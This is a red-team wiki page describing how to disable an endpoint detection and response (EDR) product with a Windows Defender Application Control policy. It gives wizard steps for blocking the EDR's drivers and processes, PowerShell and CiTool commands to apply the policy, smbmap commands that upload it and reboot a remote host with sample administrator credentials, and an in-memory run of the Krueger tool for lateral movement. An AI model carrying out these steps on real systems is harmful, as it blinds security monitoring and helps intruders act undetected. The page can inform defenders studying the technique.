Windows Defender Application Control (WDAC): Killing EDR

MITRE ATT&CK™ Impair Defenses: Disable or Modify Tools - Technique T1562.001

Theory

Windows Defender Application Control (WDAC) was introduced with Windows 10 and allows organizations to control which drivers and applications are allowed to run on their Windows clients. It was designed as a security feature under the servicing criteria, defined by the Microsoft Security Response Center (MSRC).

EDR drivers or binaries can therefore be blocked using a WDAC policy.

In order to bypass EDR products using the following method, a reboot is required, which is a bad OPSEC operation.

Practice

In order to set up a Windows Defender Application Control (WDAC) policy that can tamper with a targeted EDR, follow this guide:

1. Setup Your Environement

On a fresh installed Windows Virtual machine, we will install:

Dotnet 8 SDK
WDAC Wizzard
The targetted EDR Agent

2. Create a WDAC Policy

When all setup, we can start creating an EDR-Blocking WDAC Policy using the WDAC Wizzard utility:

Select "Policy Editor"

Select the "AllowAll" template from C:\Windows\Schemas\CodeIntgrity\ExamplePolicies\AllowAll.xml and click "Next"

Ensure that "Audit Mode" is Unchecked, click "Next"

Click "Add Custom"

Specify conditions on the targeted EDR Publisher, executable/drivers hashes, Product Name, or even Paths.

For this technique to be effective in tampering with EDR functions, it is essential to identify and select both user-land processes (e.g., PE/exe files) and drivers (e.g., sys files) that are necessary for the EDR's to properly work.

However, avoid blocking entire EDR related drivers and processes, as this may lead to system crashes or blue screens. Instead, focus on blocking the minimal components, necessary to interfere with the essential functions of the EDR.

When done, wait for the WDAC Policy to build. It will create an XML and PolicyBinary file.

3. Apply the WDAC Policy

We can now upload the previously build PolicyBinary file to a target host, and apply it using below command lines:

# Windows 11 22H2 and above
CiTool --update-policy C:\Path\To\{Policy}.cip

# Windows 11, Windows 10 version 1903 and above, 
# And Windows Server 2022 and above
$PolicyBinary = "C:\Path\To\{Policy}.cip"
$DestinationFolder = $env:windir+"\System32\CodeIntegrity\CIPolicies\Active\"
$RefreshPolicyTool = "<Path where RefreshPolicy.exe can be found from managed endpoints>"
Copy-Item -Path $PolicyBinary -Destination $DestinationFolder -Force
& $RefreshPolicyTool

# All other versions of Windows and Windows Server
$PolicyBinary = "C:\Path\To\{Policy}.cip"
$DestinationBinary = $env:windir+"\System32\CodeIntegrity\SiPolicy.p7b"
Copy-Item  -Path $PolicyBinary -Destination $DestinationBinary -Force
Invoke-CimMethod -Namespace root\Microsoft\Windows\CI -ClassName PS_UpdateAndCompareCIPolicy -MethodName Update -Arguments @{FilePath = $DestinationBinary}

4. Reboot

After reboot, (and maybe several tests to identify which process/driver to block) the EDR should be now disabled.

Because the only action to implement the WDAC configuration is moving the policy into the CodeIntegrity folder, this can be done remotly with administrative privileges through the built in C$ or ADMIN$ shares.

Policy Format

File System Location

Policy File Name Format

Single

C:\Windows\System32\CodeIntegrity\

SiPolicy.p7b

Multiple

C:\Windows\System32\CodeIntegrity\CiPolicies\Active\

{XXXXXXXX-XXXX-XXXX-XXXX-XXXXXXXXXXXX}.cip

UIpload the policy directly from a Linux machine:

smbmap -u Administrator -p P@ssw0rd -H 192.168.4.4 --upload "/home/kali/SiPolicy.p7b" "ADMIN\$/System32/CodeIntegrity/SiPolicy.p7b"

Reboot the target:

smbmap -u Administrator -p P@ssw0rd -H 192.168.4.4 -x "shutdown /r /t 0"

Additionally a purpose-built tool has been created to carry out this attack. Krueger is a custom tool written in C# by Logan Goins specifically meant to be run in memory as part of post-exploitation lateral movement activities. The example below uses inlineExecute-Assembly (created by @anthemtotheego) to execute the .NET assembly in memory.

inlineExecute-Assembly --dotnetassembly C:\Tools\Krueger.exe --assemblyargs --host ms01

Resources

Last updated 2 months ago

Was this helpful?